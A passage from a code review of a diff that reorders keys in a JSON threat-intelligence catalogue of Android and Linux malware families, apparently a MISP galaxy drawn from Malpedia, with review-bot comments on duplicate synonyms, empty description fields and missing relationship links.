Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.retefe", "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/", 
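Review bot: The Marcher entry re-emits `"synonyms": ["ExoBot"]`, but ExoBot is also a standalone value in the previous hunk (`apk.exobot`, uuid `c9f2b058-6c22-462a-a20a-fca933a597dd`), so the same name maps to two uuids within one cluster and a tag such as `misp-galaxy:malpedia="ExoBot"` has no single owner. The references themselves hint at lineage rather than identity (the clientsidedetection "exobot_v2" post under Marcher, the leaked-source post under ExoBot), so a `"related": [{"dest-uuid": "c9f2b058-6c22-462a-a20a-fca933a597dd", "type": "similar"}]` on Marcher would capture that without the name collision. Also, the RedAlert2 description in this hunk reads `"RedAlert 2 is an new Android malware"` — `an new` should be `a new`; since the line is moved by this commit anyway, the typo can be fixed in passing.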
@@ -522,234 +524,234 @@ "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", - "value": "Retefe", - "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected." + "value": "Retefe" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.roaming_mantis", "https://securelist.com/roaming-mantis-dabbles-in-mining-and-phishing-multilingually/85607/", "https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "31d2ce1f-44bf-4738-a41d-ddb43466cd82", - "value": "Roaming Mantis", - "description": "" + "value": "Roaming Mantis" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.rootnik", "https://blog.fortinet.com/2017/01/24/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-i-debugging-in-the-scope-of-native-layer", "https://blog.fortinet.com/2017/01/26/deep-analysis-of-android-rootnik-malware-using-advanced-anti-debug-and-anti-hook-part-ii-analysis-of-the-scope-of-java" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "db3dcfd1-79d2-4c91-898f-5f2463d7c417", - "value": "Rootnik", - "description": "" + "value": "Rootnik" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.skygofree", "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", "https://cdn.securelist.com/files/2018/01/Skygofree_appendix_eng.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f5fded3c-8f45-471a-a372-d8be101e1b22", - "value": "Skygofree", - "description": "" + "value": "Skygofree" }, { + "description": "", "meta": { - "synonyms": [ - "SlemBunk" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slempo", "https://www.pcworld.com/article/3035725/source-code-for-powerful-android-banking-malware-is-leaked.html", "https://www.fireeye.com/blog/threat-research/2015/12/slembunk_an_evolvin.html" - ] + ], + "synonyms": [ + "SlemBunk" + ], + "type": [] }, "uuid": "d87e2574-7b9c-4ea7-98eb-88f3e139f6ff", - "value": "Slempo", - "description": "" + "value": "Slempo" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.slocker", "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0", - "value": "Slocker", - "description": "" + "value": "Slocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.smsspy" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7a38c552-0e1a-4980-8d62-1aa38617efab", - "value": "SMSspy", - "description": "" + "value": "SMSspy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spybanker", "https://news.drweb.com/show/?i=11104&lng=en", "http://www.welivesecurity.com/2017/02/23/released-android-malware-source-code-used-run-banking-botnet/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e186384b-8001-4cdd-b170-1548deb8bf04", - "value": 
"SpyBanker", - "description": "" + "value": "SpyBanker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.spynote", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "31592c69-d540-4617-8253-71ae0c45526c", - "value": "SpyNote", - "description": "" + "value": "SpyNote" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthagent", "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0777cb30-534f-44bb-a7af-906a422bd624", - "value": "StealthAgent", - "description": "" + "value": "StealthAgent" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.stealthmango", "https://www.lookout.com/info/stealth-mango-report-ty" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7d480f11-3de8-463d-8a19-54685c8b9e0f", - "value": "Stealth Mango", - "description": "" + "value": "Stealth Mango" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.svpeng", "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76", - "value": "Svpeng", - "description": "" + "value": "Svpeng" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.switcher", "https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e3e90666-bc19-4741-aca8-1e4cbc2f4c9e", - "value": "Switcher", - "description": "" + "value": "Switcher" }, { + "description": "", "meta": 
{ - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.telerat", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e1600d04-d2f7-4862-8bbc-0f038ea683ea", - "value": "TeleRAT", - "description": "" + "value": "TeleRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tempting_cedar", "https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "982c3554-1df2-4062-8f32-f311940ad9ff", - "value": "TemptingCedar Spyware", - "description": "" + "value": "TemptingCedar Spyware" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz", + "http://blog.group-ib.com/cron" + ], "synonyms": [ "Catelites Android Bot", "MarsElite Android Bot" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/apk.tinyz", - "http://blog.group-ib.com/cron" - ] + "type": [] }, "uuid": "93b27a50-f9b7-4ab6-bb9f-70a4b914eec3", - "value": "TinyZ", - "description": "" + "value": "TinyZ" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.titan", "https://blog.lookout.com/titan-mobile-threat", "https://www.alienvault.com/blogs/labs-research/delivery-keyboy" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7d418da3-d9d2-4005-8cc7-7677d1b11327", - "value": "Titan", - "description": "" + "value": "Titan" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.triada", "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/", 
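Review bot: `"description": ""` is kept as an empty-string placeholder on most entries in this hunk (Roaming Mantis, Rootnik, Skygofree, Slempo and the rest through Triada) and in every later hunk of the file, while Retefe in the same hunk carries real text under the same key. An empty string and an absent key read the same to a human but not to a consumer that tests for presence or renders the field, so the file should settle on one policy; if the galaxy schema requires the key, leave it, otherwise dropping it where nothing is known gives a smaller and clearer file. Whichever way it goes, it belongs in a separate commit so this key re-sort stays a pure no-op that a reviewer can verify by comparing parsed objects.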
@@ -757,138 +759,146 @@ "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/", "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fa5fdfd2-8142-43f5-9b48-d1033b5398c8", - "value": "Triada", - "description": "" + "value": "Triada" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001", "https://twitter.com/illegalFawn/status/826775250583035904" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bbd5a32e-a080-4f16-98ea-ad8863507aa6", - "value": "Unidentified APK 001", - "description": "" + "value": "Unidentified APK 001" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544", - "value": "Unidentified APK 002", - "description": "" + "value": "Unidentified APK 002" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat", "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/", "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3482f5fe-f129-4c77-ae98-76e25f6086b9", - "value": "Viper RAT", - "description": "" + "value": "Viper RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex", "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/", "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": 
"77f2254c-9886-4eed-a7c3-bbcef4a97d46", - "value": "WireX", - "description": "" + "value": "WireX" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot", "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/", "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387", - "value": "Xbot", - "description": "" + "value": "Xbot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat", "https://blog.lookout.com/xrat-mobile-threat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32", - "value": "XRat", - "description": "" + "value": "XRat" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark", "https://securelist.com/whos-who-in-the-zoo/85394", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b1fc66de-fda7-4f0c-af00-751d334444b3", - "value": "ZooPark", - "description": "" + "value": "ZooPark" }, { + "description": "", "meta": { - "synonyms": [ - "Qysly" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg", "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1", "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2", "https://securelist.com/ztorg-from-rooting-to-sms/78775/" - ] + ], + "synonyms": [ + "Qysly" + ], + "type": [] }, "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202", - "value": "Ztorg", - "description": "" + "value": "Ztorg" }, { + "description": 
"", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoor_irc16", "https://news.drweb.com/show/?c=5&i=10193&lng=en" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3008fa01-492a-42e2-ab9b-a0a9d12823b8", - "value": "Irc16", - "description": "" + "value": "Irc16" }, { + "description": "", "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite", + "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", + "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/", + "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf" + ], "synonyms": [ "gayfgt", "Gafgyt", @@ -896,24 +906,14 @@ "torlus", "lizkebab" ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite", - "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", - "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/", - "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf" - ] + "type": [] }, "uuid": "81917a93-6a70-4334-afe2-56904c1fafe9", - "value": "Bashlite", - "description": "" + "value": "Bashlite" }, { + "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech", "meta": { - "synonyms": [ - "CDorked.A" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked", "https://www.symantec.com/security-center/writeup/2013-050214-5501-99", 
@@ -921,85 +921,87 @@ "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/", "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/", "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html" - ] + ], + "synonyms": [ + "CDorked.A" + ], + "type": [] }, "uuid": "bb9eaaec-97c9-4014-94dd-129cecf31ff0", - "value": "CDorked", - "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech" + "value": "CDorked" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro", "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b", - "value": "Chapro", - "description": "" + "value": "Chapro" }, { + "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer", "https://github.com/pooler/cpuminer" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", - "value": "Cpuminer", - "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining." + "value": "Cpuminer" }, { + "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. 
It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5", - "value": "Ebury", - "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET." 
+ "value": "Ebury" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus", "https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", - "value": "Erebus", - "description": "" + "value": "Erebus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ext4", "https://www.recordedfuture.com/chinese-cyberespionage-operations/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60", - "value": "ext4", - "description": "" + "value": "ext4" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime", "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf", 
@@ -1010,31 +1012,29 @@
 "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461",
 "https://blog.netlab.360.com/quick-summary-port-8291-scan-en/",
 "https://github.com/Psychotropos/hajime_hashes"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489",
- "value": "Hajime",
- "description": ""
+ "value": "Hajime"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hakai",
 "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "0839c28a-ea11-44d4-93d1-24b246ef6743",
- "value": "Hakai",
- "description": ""
+ "value": "Hakai"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "HNS"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek",
 "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/",
@@ -1043,89 +1043,91 @@ "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/", "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/", "https://blog.netlab.360.com/hns-botnet-recent-activities-en/" - ] + ], + "synonyms": [ + "HNS" + ], + "type": [] }, "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b", - "value": "Hide and Seek", - "description": "" + "value": "Hide and Seek" }, { + "description": "", "meta": { - "synonyms": [ - "IoTroop", - "Reaper" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper", "https://research.checkpoint.com/new-iot-botnet-storm-coming/", "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/", "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm", "https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/" - ] + ], + "synonyms": [ + "IoTroop", + "Reaper" + ], + "type": [] }, "uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2", - "value": "IoT Reaper", - "description": "" + "value": "IoT Reaper" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.jenx", "https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6a4365fc-8448-4270-ba93-0341788d004b", - "value": "JenX", - "description": "" + "value": "JenX" }, { + "description": "", "meta": { - "synonyms": [ - "STD" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten", "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf" - ] + ], + "synonyms": [ + "STD" + ], + "type": [] }, "uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12", - "value": "Kaiten", - "description": "" + "value": "Kaiten" }, { + "description": "", "meta": { - "synonyms": [], - 
"type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady", "https://news.drweb.com/news/?i=10140&lng=en" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", - "value": "Lady", - "description": "" + "value": "Lady" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey", "http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "aae3b83d-a116-4ebc-aae0-f6327ef174ea", - "value": "MiKey", - "description": "" + "value": "MiKey" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai", "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", 
@@ -1137,57 +1139,57 @@
 "https://github.com/jgamblin/Mirai-Source-Code",
 "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/",
 "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c",
- "value": "Mirai",
- "description": ""
+ "value": "Mirai"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mokes",
 "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217",
- "value": "Mokes",
- "description": ""
+ "value": "Mokes"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose",
 "http://www.welivesecurity.com/2015/05/26/moose-router-worm/",
 "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/",
 "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0",
- "value": "Moose",
- "description": ""
+ "value": "Moose"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack",
 "https://news.drweb.com/?i=5760&c=23&lng=en"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50",
- "value": "MrBlack",
- "description": ""
+ "value": "MrBlack"
 },
 {
+ "description": "Mirai variant by actor \"Anarchy\" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices.",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari",
"https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/", 
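Review bot: Owari's new `"description"` calls it a `Mirai variant`, and the Mirai entry sits a few lines above in this hunk with uuid `17e12216-a303-4a00-8283-d3fe92d0934c`, yet the relationship is carried only in prose that no tool can follow. If this cluster uses the `related`/`dest-uuid` convention, a related entry pointing at that uuid would make the lineage machine-readable; the same applies to Satori in the `@@ -1197` hunk, whose description names `elf.mirai` by its Malpedia id rather than linking the entry. The reorder itself is fine; this is a data-modelling gap the commit leaves untouched.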
@@ -1197,84 +1199,84 @@ "https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863", "https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html", "https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ec67f206-6464-48cf-a012-3cdfc1278488", - "value": "Owari", - "description": "Mirai variant by actor \"Anarchy\" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices." + "value": "Owari" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla", "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf", "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf", "https://twitter.com/juanandres_gs/status/944741575837528064" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "262e0cf2-2fed-4d37-8d7a-0fd62c712840", - "value": "Penquin Turla", - "description": "" + "value": "Penquin Turla" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai", "http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", - "value": "Persirai", - "description": "" + "value": "Persirai" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.r2r2", "https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "759f8590-a049-4c14-be8a-e6605e2cd43d", - "value": "r2r2", - "description": "" + "value": "r2r2" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos", "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5", - "value": "Rakos", - "description": "" + "value": "Rakos" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex", "https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/", "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b", - "value": "Rex", - "description": "" + "value": "Rex" }, { + "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori", "http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/", 
@@ -1283,153 +1285,153 @@ "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/", "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/", "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0", - "value": "Satori", - "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361)." + "value": "Satori" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shellbind", "http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b51caf06-736e-46fc-9b13-48b0b81df4b7", - "value": "ShellBind", - "description": "" + "value": "ShellBind" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga", 